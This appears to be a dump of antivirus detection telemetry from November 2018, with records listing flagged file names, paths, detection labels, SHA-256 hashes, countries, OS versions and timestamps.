  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:52:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='store - na.scr', filepath='C:\\Users\\X\\Documents\\Corel\\Content X6\\Templates\\Craft Store - NA\\Store - NA.scr', filesize=512000, name='TR/Drop.Agent.cpg.#M1.#R1'), hash='0d20ee5ac1e8c31329221f09fab4a4350258c2c82cf66133e3941c823fbc3a12', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:37:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='6a2db419db9e49e45998e30cfc3c61e0be4e917c85b67c4c68f4445bd16794e6', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-37\\6A2DB419DB9E49E45998E30CFC3C61E0BE4E917C85B67C4C68F4445BD16794E6', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='6a2db419db9e49e45998e30cfc3c61e0be4e917c85b67c4c68f4445bd16794e6', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:21:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050253-8648c955', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050253-8648C955', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:02:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered lecir', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered lecir', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='4e8faa8504d874dfea83a0703b9800ded2f109e18a767ac7f9a0ced7de71390d', metadata=Row(cmdline='-k netsvcs', country='US', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=23040, timestamp='2018-11-02T02:01:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054656-adcc4c2c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054656-ADCC4C2C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:46:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='j111.exe', filepath='J111.exe', filesize=1152000, name='DR/Delphi.6abe65.#M1.#R1'), hash='6abe6528568d3820b27e309c4369b24bf0f1dc41bf8c3774d9c2526104f6a5ff', metadata=Row(cmdline=None, country='DE', os_name='Linux', os_vmajor='3', os_vminor='14', parentproc=None, parentsize=None, timestamp='2018-11-02T06:55:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-072438-2385920c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3d793a27\\AVSCAN-20181102-072415-1E7C018A\\AVSCAN-20181102-072438-2385920C', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T06:24:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='unwise32.exe', filepath='C:\\Users\\X\\Desktop\\Salvataggio Dati\\dapcinfo301208\\CuteFTP\\UNWISE32.EXE', filesize=128000, name='HEUR/Patched.Ren.#M1.#R1'), hash='4f498247f5cf74378b9de7a5e03494c9fa1e4491c868c5ff318e82a7010eb68a', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T07:50:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-091019-24d68713', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a0e3a42d\\AVSCAN-20181102-090546-025CE972\\AVSCAN-20181102-091019-24D68713', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T02:10:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055623-ff81ba78', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055623-FF81BA78', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:56:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='javaws.exe', filepath='C:\\Users\\X\\alterland-launcher\\updates\\jre-8u131-win64\\bin\\javaws.exe', filesize=360000, name='W32/Neshta.A.#M1.#R1'), hash='5780857f84d31a0764c9a865bfe936cf45f146db5c69bd9ff5db3b842d5b93a9', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe52_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe52 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T02:18:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053139-8af11d0b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053139-8AF11D0B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:31:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa0.206\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa0.206\\Setup.exe', parentsize=1551000, timestamp='2018-11-02T03:06:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055218-6d8df63a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055218-6D8DF63A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:52:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-132609-9181d4c9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_4ca86332\\AVSCAN-20181102-131118-1FB9A0FB\\AVSCAN-20181102-132609-9181D4C9', filesize=148000, name='ADWARE/DealPly.Gen4.#M1.#R1'), hash='5f456982046db60202faa8a29d13eb84860f00a648b39919dded52111b130275', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T12:26:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061413-7d72f9dd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061413-7D72F9DD', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:14:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054203-ff3f6ab9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054203-FF3F6AB9', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:42:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='dealplylive.exe', filepath='C:\\Program Files (x86)\\DealPlyLive\\Update\\DealPlyLive.exe', filesize=148000, name='ADWARE/DealPly.Gen4.#M300.#R300171'), hash='5f456982046db60202faa8a29d13eb84860f00a648b39919dded52111b130275', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\services.exe', parentsize=None, timestamp='2018-11-02T12:33:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052247-4de6de24', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052247-4DE6DE24', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:22:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053159-96d454ec', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053159-96D454EC', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:31:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp00007592', filepath='C:\\Windows\\Temp\\tmp00000360\\tmp00007592', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-02T15:50:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053150-91dfd28d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053150-91DFD28D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:31:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='reltz30l8svlji.x64.dll.vir', filepath='c:\\qoobox\\quarantine\\c\\program files (x86)\\sahhopdiroop\\rElTz30L8SVlJI.x64.dll.vir', filesize=704000, name='ADWARE/MultiPlug.Gen4.#M300.#R300238'), hash='48f23387361181c45e19dbff54db526ba9501cc074489d62520d01e240d4925b', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T12:13:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055540-e606024f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055540-E606024F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:55:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060556-54f01f46', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060556-54F01F46', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:05:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061032-f9ef73d3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061032-F9EF73D3', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:10:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060824-ad430662', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060824-AD430662', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:08:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060019-8c727898', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060019-8C727898', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:00:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062428-ebdb5bf2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062428-EBDB5BF2', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:24:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060023-8efa0fe3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060023-8EFA0FE3', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:00:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052026-f9f848d5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052026-F9F848D5', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:20:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051009-8a64bd0f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051009-8A64BD0F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:10:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061914-30b0aa50', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061914-30B0AA50', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:19:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061654-dd59ea46', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061654-DD59EA46', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:16:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052656-e23b0001', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052656-E23B0001', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:26:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053452-fe103415', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053452-FE103415', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:34:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061619-c8933f88', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061619-C8933F88', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:16:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055127-4ef80334', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055127-4EF80334', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:51:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054003-b7b3255b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054003-B7B3255B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:40:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052608-c607983c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052608-C607983C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:26:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060506-3744e1a4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060506-3744E1A4', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:05:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061922-3555d1b4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061922-3555D1B4', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:19:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061818-0f393dac', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061818-0F393DAC', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:18:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054017-bfdb271b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054017-BFDB271B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:40:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052138-24fee247', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052138-24FEE247', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:21:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060426-1fb73ca1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060426-1FB73CA1', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:04:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060018-8bb4cd6d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060018-8BB4CD6D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:00:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T21:38:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053351-da04df61', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053351-DA04DF61', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:33:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060735-9070fded', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060735-9070FDED', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:07:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050823-4ad7b219', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050823-4AD7B219', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:08:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054400-451399c5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054400-451399C5', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:43:59Z'), dt=datetime.date(2018, 11, 2)),
